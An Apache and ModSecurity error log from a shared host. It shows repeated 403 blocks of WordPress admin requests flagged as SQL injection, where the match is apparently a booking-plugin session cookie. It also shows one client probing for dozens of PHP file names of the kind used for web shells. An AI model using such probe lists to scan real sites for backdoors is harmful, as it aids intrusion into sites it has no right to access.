"/wp-admin/edit.php"] [unique_id "agIFt1V4kyjgo4bQBUiCeQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:11.152649 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFt1V4kyjgo4bQBUiCeQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:11.773525 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFt1V4kyjgo4bQBUiCeQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:12.036742 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFuFV4kyjgo4bQBUiCewAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:12.037026 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFuFV4kyjgo4bQBUiCewAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:12.655227 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFuFV4kyjgo4bQBUiCewAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:12.938993 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFuFV4kyjgo4bQBUiCfAAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:12.939275 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFuFV4kyjgo4bQBUiCfAAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:13.479000 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFuFV4kyjgo4bQBUiCfAAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:14.062769 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFulV4kyjgo4bQBUiCfgAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:14.063193 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFulV4kyjgo4bQBUiCfgAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:14.618324 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFulV4kyjgo4bQBUiCfgAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:14.731188 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFulV4kyjgo4bQBUiCfwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:14.731519 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFulV4kyjgo4bQBUiCfwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:15.102517 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFulV4kyjgo4bQBUiCfwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:15.410473 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFu1V4kyjgo4bQBUiCgQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:15.410749 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFu1V4kyjgo4bQBUiCgQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:16.016642 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFu1V4kyjgo4bQBUiCgQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:16.380324 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFvFV4kyjgo4bQBUiCggAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:16.380611 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFvFV4kyjgo4bQBUiCggAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:16.982317 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFvFV4kyjgo4bQBUiCggAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:17.262207 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFvVV4kyjgo4bQBUiChAAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:17.262485 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFvVV4kyjgo4bQBUiChAAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:17.866631 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFvVV4kyjgo4bQBUiChAAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:26.899964 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/file.php
[Mon May 11 18:37:26.900356 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:27.058253 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/gettest.php
[Mon May 11 18:37:27.058343 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:27.217145 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/gg.php
[Mon May 11 18:37:27.217248 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:27.391473 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/goods.php
[Mon May 11 18:37:27.391558 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:27.549559 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/maintenance.php
[Mon May 11 18:37:27.549654 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:27.708547 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/info.php
[Mon May 11 18:37:27.708635 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:27.867327 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/users.php
[Mon May 11 18:37:27.867411 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:28.025883 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/install.php
[Mon May 11 18:37:28.025979 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:28.194650 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/item.php
[Mon May 11 18:37:28.194750 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:28.352809 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/jga.php
[Mon May 11 18:37:28.352896 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:28.510773 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/leaf.php
[Mon May 11 18:37:28.510855 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:28.681784 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/ms-files.php
[Mon May 11 18:37:28.681883 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:28.839967 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/lock.php
[Mon May 11 18:37:28.840055 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:28.998234 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/wp-blog-header.php
[Mon May 11 18:37:28.998320 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:29.157820 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/lock360.php
[Mon May 11 18:37:29.157911 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:29.316405 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/log.php
[Mon May 11 18:37:29.316490 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:29.500244 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/manager.php
[Mon May 11 18:37:29.500388 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:29.660107 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/meta.php
[Mon May 11 18:37:29.660235 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:29.818525 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/mini.php
[Mon May 11 18:37:29.818614 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:29.977440 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/mjq.php
[Mon May 11 18:37:29.977531 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:30.139057 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/new.php
[Mon May 11 18:37:30.139169 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:30.300105 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/onclickfuns.php
[Mon May 11 18:37:30.300217 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:30.460952 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/option.php
[Mon May 11 18:37:30.461077 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:30.621664 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/plugin-editor.php
[Mon May 11 18:37:30.621757 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:30.791126 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/profile.php
[Mon May 11 18:37:30.791253 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:30.951893 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/qw_03b4ad31.php
[Mon May 11 18:37:30.951985 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:31.112753 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/radio.php
[Mon May 11 18:37:31.112858 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:31.272875 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/sf.php
[Mon May 11 18:37:31.272959 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:31.431789 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/simple.php
[Mon May 11 18:37:31.431961 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:31.590173 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/sql.php
[Mon May 11 18:37:31.590286 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:31.749529 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/test.php
[Mon May 11 18:37:31.749647 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:31.908442 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/test1.php
[Mon May 11 18:37:31.908537 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:32.067018 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/themes.php
[Mon May 11 18:37:32.067109 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:32.225211 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:32.384690 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/wp-admin.php
[Mon May 11 18:37:32.384780 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:32.543595 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:32.726804 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/wp-blog-header.php
